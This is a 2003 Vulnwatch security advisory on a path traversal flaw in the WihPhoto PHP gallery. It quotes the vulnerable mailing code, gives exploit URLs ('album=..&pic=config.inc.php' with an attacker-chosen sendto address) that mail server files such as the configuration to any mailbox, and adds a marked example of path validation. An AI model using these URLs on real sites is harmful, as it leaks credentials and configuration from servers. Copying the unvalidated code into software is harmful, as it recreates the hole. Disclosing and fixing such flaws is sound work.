Vulnwatch mailing list archives

WihPhoto (PHP)


From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 23 Feb 2003 18:44:58 +0100


Information :
°°°°°°°°°°°°°
Version : 0.86-dev
Website : http://www.wihsy.com
Problem : any file on the hard disk can be sent by mail


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
util/email.php :

------------------------------------------------------------------------
<?
class CMailFile {
        var $subject;
        var $addr_to;
        var $text_body;
        var $text_encoded;
        var $mime_headers;
        var $mime_boundary = "--==================_846811060==_";
        var $smtp_headers;

        function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) {
                $this->subject = $subject;
                $this->addr_to = $to;
                $this->smtp_headers = $this->write_smtpheaders($from);
                $this->text_body = $this->write_body($msg);
                $this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename);
                $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename);
        }


        function attach_file($filename,$mimetype,$mime_filename) {
                $encoded = $this->encode_file($filename);
                if ($mime_filename) $filename = $mime_filename;
                $out = "--" . $this->mime_boundary . "\n";
                $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n";
                $out = $out . "Content-Transfer-Encoding: base64\n";
                $out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n";
                $out = $out . $encoded . "\n";
                // added -- to notify email client attachment is done
                $out = $out . "--" . $this->mime_boundary . "--" . "\n";
                return $out;
        }


        function encode_file($sourcefile) {
                // reads whatever path it is handed; the only check is that the file is readable
                if (is_readable($sourcefile)) {
                        $fd = fopen($sourcefile, "r");
                        $contents = fread($fd, filesize($sourcefile));
                        $encoded = my_chunk_split(base64_encode($contents));
                        fclose($fd);
                }
                return $encoded;
        }

        function sendfile() {
                $headers = $this->smtp_headers . $this->mime_headers;
                $message = $this->text_body . $this->text_encoded;
                mail($this->addr_to,$this->subject,$message,$headers);
        }

[...]

        function write_mimeheaders($filename, $mime_filename) {
                if ($mime_filename) $filename = $mime_filename;
                $out = "MIME-version: 1.0\n";
                $out = $out . "Content-type: multipart/mixed; ";
                $out = $out . "boundary=\"$this->mime_boundary\"\n";
                $out = $out . "Content-transfer-encoding: 7BIT\n";
                $out = $out . "X-attachments: $filename;\n\n";
                return $out;
        }
[...]
}
[...]
------------------------------------------------------------------------



sendphoto.php :

------------------------------------------------------------------------
include("util/email.php");

include("config.inc.php");

[...]
if (!$filled) {

print "<FORM METHOD=POST ACTION=sendphoto.php>\n";
print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n";
print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n";
print "<INPUT TYPE=hidden NAME=album VALUE=";
print rawurlencode($album);
print ">\n";
print "<center><p>$sendphoto_send_photo_to<br>";
print "<INPUT NAME=sendto></input></center>\n";
print "<p>\n";
print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n";
print "</form>\n";
print "</body></html>\n";

}
else
{

$message  = "$sendphoto_message";
// $album and $pic come straight from the request; ".." is never filtered out
$album1 = rawurldecode($album);
$filetoattach = "./$pix_base/$album1/$pic";
$mimetype = "image/jpeg";

// the attachment goes to whatever address was supplied in $sendto
$newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype);
$newmail->sendfile();

print "$sendphoto_successful";

print "</body></html>\n";
}

?>
------------------------------------------------------------------------



Exploits :
°°°°°°°°°°
http://[target]/sendphoto.php?album=..&pic=config.inc.php
or
http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1

where [E-MAIL] is the mailbox to which http://[target]/config.inc.php will be sent.
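The root cause is that sendphoto.php builds the attachment path from the raw album and pic parameters. The following is an added example of how the path could be validated before it reaches CMailFile; it is neither WihPhoto's code nor the phpsecure.info patch, and resolve_photo_path is a made-up helper name ($pix_base is the config variable from the script above).

```php
<?php
// Added example, not part of WihPhoto or its patch. Resolves album/pic against
// the photo base directory and refuses anything that escapes it or is not a JPEG.
function resolve_photo_path($pix_base, $album, $pic) {
    // Reject empty components, NUL bytes, path separators and dot segments
    // before touching the filesystem at all.
    foreach (array($album, $pic) as $part) {
        if ($part === '' || strpos($part, "\0") !== false
            || preg_match('#[/\\\\]#', $part) || $part === '.' || $part === '..') {
            return false;
        }
    }
    // The script hard-codes image/jpeg, so only allow plain JPEG file names.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.jpe?g$/i', $pic)) {
        return false;
    }
    $base = realpath($pix_base);
    $candidate = realpath($pix_base . '/' . $album . '/' . $pic);
    if ($base === false || $candidate === false) {
        return false;
    }
    // realpath() collapses ".." and symlinks; the result must still sit below $base.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $candidate;
}

// Constructed demonstration tree (not real WihPhoto data).
$tmp = sys_get_temp_dir() . '/wihphoto_demo_' . getmypid();
mkdir($tmp . '/pix/holiday', 0700, true);
file_put_contents($tmp . '/pix/holiday/beach.jpg', 'placeholder image bytes');
file_put_contents($tmp . '/config.inc.php', '<?php $db_password = "placeholder";');

// A legitimate request resolves to a path inside the album tree.
var_dump(resolve_photo_path($tmp . '/pix', 'holiday', 'beach.jpg'));
// The request from the advisory (album=.., pic=config.inc.php) is refused.
var_dump(resolve_photo_path($tmp . '/pix', '..', 'config.inc.php'));
// Traversal hidden inside the pic parameter is refused as well.
var_dump(resolve_photo_path($tmp . '/pix', 'holiday', '../../config.inc.php'));

// Clean up the demonstration tree.
unlink($tmp . '/pix/holiday/beach.jpg');
unlink($tmp . '/config.inc.php');
rmdir($tmp . '/pix/holiday');
rmdir($tmp . '/pix');
rmdir($tmp);
```

Validating the recipient address (for example with an allow-list of registered users rather than a free-form sendto field) closes the second half of the issue, since the script otherwise mails the file to any address supplied.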



Patch :
°°°°°°°
A patch can be found at http://www.phpsecure.info.


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WihPhoto.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n

